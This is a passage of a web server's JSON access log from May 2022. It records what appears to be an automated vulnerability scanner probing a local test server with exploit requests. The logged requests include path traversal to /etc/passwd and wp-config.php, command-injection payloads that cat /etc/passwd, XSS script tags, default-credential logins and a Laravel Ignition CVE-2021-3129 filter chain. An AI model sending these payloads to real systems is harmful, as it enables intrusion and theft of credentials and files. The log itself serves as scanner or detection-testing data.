10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WCC2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"login=admin&pwd=admin&lang=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /op/op.Login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /puppet-ca/v1/certificate_request/29K6BURsm3zGLGr0N5ASzOYcgBp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/serverInfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/deployment.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/elFinder.version.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"{'jql':'project in projectsLeadByUser(\x2229K6BWPi2LAppPQZNJl8hErw5fF\x22)'}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/issueNav/1/issueTable HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pp=env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phppgadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/resolution HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /updating.jsp?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debugbar/open?max=20&offset=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AirWatch/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/_catalog HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/workspace.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/Login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/wdisp/admin/public/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=&action=edit&f1=.//./\x5C.//./\x5C.//./\x5C.//./\x5C.//./\x5C.//./etc/passwd&restore=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_dump.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/user_add.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.vscode/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"ProjectDiscoverydwisiswant0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/?uid=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0a/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owncloud/config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22AA\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 